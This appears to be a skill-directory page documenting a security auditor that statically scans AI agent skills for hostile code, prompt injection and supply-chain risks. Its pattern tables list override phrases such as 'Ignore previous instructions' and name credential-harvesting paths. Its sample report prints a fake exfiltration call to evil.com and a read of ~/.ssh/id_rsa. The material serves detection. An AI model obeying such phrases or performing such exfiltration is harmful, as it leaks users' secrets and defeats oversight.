S
SkillNav

skill-security-auditor

Universal

by alirezarezvani

>

View Chinese version with editor review

安装

claude skill add --url github.com/alirezarezvani/claude-skills/tree/main/engineering/skill-security-auditor

文档

Skill Security Auditor

Scan and audit AI agent skills for security risks before installation. Produces a clear PASS / WARN / FAIL verdict with findings and remediation guidance.

Quick Start

bash
# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/

# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name

# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict

# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json

What Gets Scanned

1. Code Execution Risks (Python/Bash Scripts)

Scans all .py, .sh, .bash, .js, .ts files for:

CategoryPatterns DetectedSeverity
Command injectionos.system(), os.popen(), subprocess.call(shell=True), backtick execution🔴 CRITICAL
Code executioneval(), exec(), compile(), __import__()🔴 CRITICAL
Obfuscationbase64-encoded payloads, codecs.decode, hex-encoded strings, chr() chains🔴 CRITICAL
Network exfiltrationrequests.post(), urllib.request, socket.connect(), httpx, aiohttp🔴 CRITICAL
Credential harvestingreads from ~/.ssh, ~/.aws, ~/.config, env var extraction patterns🔴 CRITICAL
File system abusewrites outside skill dir, /etc/, ~/.bashrc, ~/.profile, symlink creation🟡 HIGH
Privilege escalationsudo, chmod 777, setuid, cron manipulation🔴 CRITICAL
Unsafe deserializationpickle.loads(), yaml.load() (without SafeLoader), marshal.loads()🟡 HIGH
Subprocess (safe)subprocess.run() with list args, no shell⚪ INFO

2. Prompt Injection in SKILL.md

Scans SKILL.md and all .md reference files for:

PatternExampleSeverity
System prompt override"Ignore previous instructions", "You are now..."🔴 CRITICAL
Role hijacking"Act as root", "Pretend you have no restrictions"🔴 CRITICAL
Safety bypass"Skip safety checks", "Disable content filtering"🔴 CRITICAL
Hidden instructionsZero-width characters, HTML comments with directives🟡 HIGH
Excessive permissions"Run any command", "Full filesystem access"🟡 HIGH
Data extraction"Send contents of", "Upload file to", "POST to"🔴 CRITICAL

3. Dependency Supply Chain

For skills with requirements.txt, package.json, or inline pip install:

CheckWhat It DoesSeverity
Known vulnerabilitiesCross-reference with PyPI/npm advisory databases🔴 CRITICAL
TyposquattingFlag packages similar to popular ones (e.g., reqeusts)🟡 HIGH
Unpinned versionsFlag requests>=2.0 vs requests==2.31.0⚪ INFO
Install commands in codepip install or npm install inside scripts🟡 HIGH
Suspicious packagesLow download count, recent creation, single maintainer⚪ INFO

4. File System & Structure

CheckWhat It DoesSeverity
Boundary violationScripts referencing paths outside skill directory🟡 HIGH
Hidden files.env, dotfiles that shouldn't be in a skill🟡 HIGH
Binary filesUnexpected executables, .so, .dll, .exe🔴 CRITICAL
Large filesFiles >1MB that could hide payloads⚪ INFO
SymlinksSymbolic links pointing outside skill directory🔴 CRITICAL

Audit Workflow

  1. Run the scanner on the skill directory or repo URL
  2. Review the report — findings grouped by severity
  3. Verdict interpretation:
    • ✅ PASS — No critical or high findings. Safe to install.
    • ⚠️ WARN — High/medium findings detected. Review manually before installing.
    • ❌ FAIL — Critical findings. Do NOT install without remediation.
  4. Remediation — each finding includes specific fix guidance

Reading the Report

code
╔══════════════════════════════════════════════╗
║  SKILL SECURITY AUDIT REPORT                ║
║  Skill: example-skill                        ║
║  Verdict: ❌ FAIL                            ║
╠══════════════════════════════════════════════╣
║  🔴 CRITICAL: 2  🟡 HIGH: 1  ⚪ INFO: 3    ║
╚══════════════════════════════════════════════╝

🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
   Pattern: eval(user_input)
   Risk: Arbitrary code execution from untrusted input
   Fix: Replace eval() with ast.literal_eval() or explicit parsing

🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
   Pattern: requests.post("https://evil.com/collect", data=results)
   Risk: Data exfiltration to external server
   Fix: Remove outbound network calls or verify destination is trusted

🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
   Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
   Risk: Reads SSH private key outside skill scope
   Fix: Remove filesystem access outside skill directory

⚪ INFO [DEPS-UNPIN] requirements.txt:3
   Pattern: requests>=2.0
   Risk: Unpinned dependency may introduce vulnerabilities
   Fix: Pin to specific version: requests==2.31.0

Advanced Usage

Audit a Skill from Git Before Cloning

bash
# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup

CI/CD Integration

yaml
# GitHub Actions step
- name: Audit Skill Security
  run: |
    python3 skill-security-auditor/scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
    if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi

Batch Audit

bash
# Audit all skills in a directory
for skill in skills/*/; do
  python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done

Threat Model Reference

For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see references/threat-model.md.

Limitations

  • Cannot detect logic bombs or time-delayed payloads with certainty
  • Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
  • Network destination reputation checks require internet access
  • Does not execute code — static analysis only (safe but less complete than dynamic analysis)
  • Dependency vulnerability checks use local pattern matching, not live CVE databases

When in doubt after an audit, don't install. Ask the skill author for clarification.